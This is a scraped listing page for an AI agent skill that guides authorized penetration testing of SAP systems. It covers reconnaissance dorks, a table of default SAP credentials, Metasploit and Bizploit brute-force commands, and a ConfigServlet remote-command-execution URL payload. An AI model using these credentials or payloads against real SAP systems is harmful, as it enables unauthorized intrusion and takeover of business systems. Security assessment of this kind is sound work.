Run any Skill in Manus with one click

$pwd:

sap-pentesting

Name: Sap Pentesting
Author: abelrguezr

// How to perform authorized penetration testing on SAP systems. Use this skill whenever the user mentions SAP security testing, SAP penetration testing, SAP vulnerability assessment, SAP GUI testing, SAP web interface testing, SAP configuration review, or needs to assess SAP system security. This includes discovery, credential testing, configuration parameter analysis, and exploit research for SAP environments.

Run Skill in Manus

$ git log --oneline --stat

stars:12

forks:3

updated:March 23, 2026 at 14:29

File Explorer

3 files

SKILL.md

readonly

related-skills.json

same repository

ai-fuzzing-assistant.md

from "abelrguezr/hacktricks-skills"

AI-assisted fuzzing and vulnerability discovery. Use this skill whenever the user wants to generate fuzzing seeds, evolve grammars, analyze crashes, create proof-of-vulnerability exploits, or generate patches for discovered bugs. Trigger on mentions of fuzzing, AFL++, libFuzzer, vulnerability discovery, crash analysis, exploit generation, or security testing with LLMs.

2026-03-2312

burp-mcp-integration.md

from "abelrguezr/hacktricks-skills"

Set up and use Burp Suite's MCP Server extension to enable LLM-assisted passive vulnerability discovery. Use this skill whenever the user wants to integrate Burp with MCP-capable AI tools (Codex, Gemini, Ollama, Claude), configure the MCP proxy, troubleshoot handshake issues, or analyze intercepted HTTP traffic for security findings. Trigger on mentions of Burp MCP, Burp AI Agent, MCP proxy setup, or LLM-assisted traffic review.

2026-03-2312

deep-learning-helper.md

from "abelrguezr/hacktricks-skills"

Help users understand and implement deep learning concepts including neural networks, CNNs, RNNs, LLMs, and diffusion models. Use this skill whenever the user asks about deep learning architectures, wants to build neural networks in PyTorch, needs help with training loops, or wants to understand concepts like backpropagation, activation functions, attention mechanisms, or generative models. Make sure to use this skill for any deep learning related questions, code reviews, architecture design, or implementation help.

2026-03-2312

llm-fundamentals.md

from "abelrguezr/hacktricks-skills"

Explain and teach Large Language Model fundamentals including pretraining, model architecture, PyTorch tensors, automatic differentiation, and backpropagation. Use this skill whenever the user asks about LLM concepts, neural network training, PyTorch operations, gradient computation, or wants to understand how LLMs work internally. Trigger on questions about model parameters, context length, embedding dimensions, tensor operations, autograd, or backpropagation.

2026-03-2312

text-tokenizer.md

from "abelrguezr/hacktricks-skills"

How to tokenize text for LLMs and NLP models. Use this skill whenever the user needs to convert text into token IDs, understand tokenization methods (BPE, WordPiece, Unigram), work with vocabularies, or implement tokenization for machine learning. Make sure to use this skill when users mention tokenizing, token IDs, vocabulary creation, BPE, WordPiece, or any text preprocessing for ML models.

2026-03-2312

llm-data-sampling.md

from "abelrguezr/hacktricks-skills"

How to prepare and sample text data for training large language models. Use this skill whenever the user mentions data preparation, tokenization, sliding windows, sequence generation, training data, LLM datasets, or needs to create input/target pairs for model training. This includes tasks like chunking text, creating dataloaders, applying sampling strategies, or optimizing training data quality.

2026-03-2312

package.json

"author": "abelrguezr"

"repository": "abelrguezr/hacktricks-skills"

View GitHub Repository View Creator Repositories

$ install --global

$ download --local

Run Skill in Manus

$ useful --forSOC

Information Security AnalystsComputer and Mathematical Occupations15-1212L4

name

sap-pentesting

description

How to perform authorized penetration testing on SAP systems. Use this skill whenever the user mentions SAP security testing, SAP penetration testing, SAP vulnerability assessment, SAP GUI testing, SAP web interface testing, SAP configuration review, or needs to assess SAP system security. This includes discovery, credential testing, configuration parameter analysis, and exploit research for SAP environments.

SAP Penetration Testing Skill

A comprehensive guide for authorized security assessment of SAP systems.

⚠️ Authorization Required

Only use this skill for authorized security testing. Ensure you have written permission before testing any SAP system. Unauthorized access to SAP systems is illegal and can result in severe legal consequences.

Overview

SAP (Systems Applications and Products in Data Processing) is an ERP software with three layers: database, application, and presentation. Each SAP instance (SID) typically has four environments: dev, test, QA, and production. The most effective attacks target the database layer.

Each SAP instance is divided into clients. The SAP* user is the application's equivalent of "root" with default password 06071992 (often unchanged in test/dev environments).

Phase 1: Discovery

OSINT and Reconnaissance

Check application scope - Note hostnames and system instances for SAP GUI connections

Use OSINT tools:

Shodan queries: sap portal, SAP Netweaver, SAP J2EE Engine

Google Dorks:

inurl:50000/irj/portal
inurl:IciEventService/IciEventConf
inurl:/wsnavigator/jsps/test.jsp
inurl:/irj/go/km/docs/

Port scanning with nmap:
- Check for SAP routers, webdnypro, web services, web servers
- Common SAP ports: 50000 (ICM), 3200-3299 (SAP instances)
Directory fuzzing (if web server present):
- Use Burp Intruder with SecLists wordlists:
  - urls_SAP.txt
  - SAP.fuzz.txt
  - sap.txt

Metasploit service discovery:

msf > use auxiliary/scanner/sap/sap_service_discovery
msf > set RHOSTS <target>
msf > set INSTANCES 00-99
msf > run

Phase 2: SAP GUI Testing

Connection

Connect using: sapgui <sap_server_hostname> <system_number>

Default Credentials Testing

Test these common default credentials (P1 severity if found in production):

User	Password	Client	Notes
SAP*	06071992	*	Hardcoded kernel user
SAP*	PASS	*	Alternative default
DDIC	19920706	000,001	Has SAP_ALL
IDEADM	admin	*	IDES systems only
EARLYWATCH	SUPPORT	066	High privileges
TMSADM	PASSWORD	000	Medium privileges
TMSADM	$1Pawd2&	000	Alternative
SAPCPIC	ADMIN	000,001	Medium privileges
SOLMAN_ADMIN	init1234	*	SOLMAN systems
SAPSUPPORT	init1234	*	SOLMAN/satellite

Trial/Developer Edition Credentials:

DDIC/SAP*/DEVELOPER/BWDEVELOPER: DidNPLpw2014, Appl1ance, Down1oad

Post-Authentication Checks

Capture credentials - Run Wireshark during authentication (some clients transmit without SSL)
Check privilege escalation via transaction codes:
- SU01 - Create/maintain users
- SU01D - Display users
- SU10 - Mass maintenance
- SU02 - Manual profile creation
- SM19 - Security audit configuration
- SE84 - Authorization information system
Test command execution - Check if you can run system commands/scripts
Test XSS - Check BAPI Explorer for XSS vulnerabilities

Phase 3: Web Interface Testing

Common Endpoints

http://SAP:50000/irj/portal - SAP Logon screen
http://SAP:50000/index.html - Index page
http://SAP:50000/startPage - Start page
http://SAP:50000/webdynpro/resources/sap.com/XXX/JWFTestAddAssignees# - User enumeration
/irj/go/km/navigation/ - Directory listing/auth bypass
http://SAP/sap/public/info - System information disclosure

Vulnerability Checks

OWASP Top 10 - Test for XSS, RCE, XXE, SQL injection
Auth bypass - Try verb tampering
HTTP credentials - Check if credentials submitted over HTTP (P3 severity)
Information disclosure - Check /sap/public/info for system details

Example: ConfigServlet RCE

http://example.com:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=uname -a

Phase 4: Configuration Parameter Review

Manual Checking (Transaction RSPFPAR)

Query parameters and check for insecure values:

Parameter	Insecure Value	Risk
`auth/object_disabling_active`	Y	Object disabling active
`auth/rfc_authority_check`	<2	Weak RFC authority check
`auth/no_check_in_some_cases`	Y	Checks bypassed
`bdc/bdel_auth_check`	FALSE	BDC auth not enforced
`gw/reg_no_conn_info`	<255	Connection info limit
`icm/security_log`	2	Security log level
`login/password_compliance_to_current_policy`	0	No password policy
`login/no_automatic_user_sapstar`	0	SAPSTAR auto-assignment
`login/min_password_lng`	<8	Short passwords allowed
`login/fails_to_user_lock`	<5	Weak lockout policy
`login/password_expiration_time`	>90	Long password lifetime
`snc/enable`	0	SNC disabled
`rsau/enable`	0	RS AU checks disabled

Automated Checking

Use SAP Parameter Validator (SAPPV):

./SAPPV.sh EXPORT.XML

Phase 5: Exploitation Research

Metasploit Modules

Search and use relevant modules:

msf > search sap

Key modules:

auxiliary/scanner/sap/sap_service_discovery - Service enumeration
auxiliary/scanner/sap/sap_icf_public_info - Info gathering
auxiliary/scanner/sap/sap_soap_rfc_ping - Service discovery
exploit/multi/sap/sap_soap_rfc_sxpg_call_system_exec - RCE
exploit/windows/http/sap_configservlet_exec_noauth - RCE

Bizploit Framework

bizploit> plugins
bizploit/plugins> vulnassess all
bizploit/plugins> vulnassess config bruteLogin
bizploit/plugins/vulnassess/config:bruteLogin> set type defaultUsers
bizploit/plugins/vulnassess/config:bruteLogin> set tryHardcodedSAPStar True
bizploit> start

Tools Reference

Tool	Purpose
PowerSAP	PowerShell SAP security assessment
Burp Suite	Web security testing
pysap	SAP protocol packet crafting
nmap-erpscan	SAP/ERP detection
SAPPV	Parameter validation
Bizploit	SAP security assessment framework

Reporting

Document findings with:

Vulnerability description
Severity rating (use Bugcrowd VRT or CVSS)
Proof of concept
Remediation recommendations
Affected systems and parameters

sap-pentesting

More from this repository

More from this repository

SAP Penetration Testing Skill

⚠️ Authorization Required

Overview

Phase 1: Discovery

OSINT and Reconnaissance

Phase 2: SAP GUI Testing

Connection

Default Credentials Testing

Post-Authentication Checks

Phase 3: Web Interface Testing

Common Endpoints

Vulnerability Checks

Example: ConfigServlet RCE

Phase 4: Configuration Parameter Review

Manual Checking (Transaction RSPFPAR)

Automated Checking

Phase 5: Exploitation Research

Metasploit Modules

Bizploit Framework

Tools Reference

Reporting

References

SAP Penetration Testing Skill

⚠️ Authorization Required

Overview

Phase 1: Discovery

OSINT and Reconnaissance

Phase 2: SAP GUI Testing

Connection

Default Credentials Testing

Post-Authentication Checks

Phase 3: Web Interface Testing

Common Endpoints

Vulnerability Checks

Example: ConfigServlet RCE

Phase 4: Configuration Parameter Review

Manual Checking (Transaction RSPFPAR)

Automated Checking

Phase 5: Exploitation Research

Metasploit Modules

Bizploit Framework

Tools Reference

Reporting

References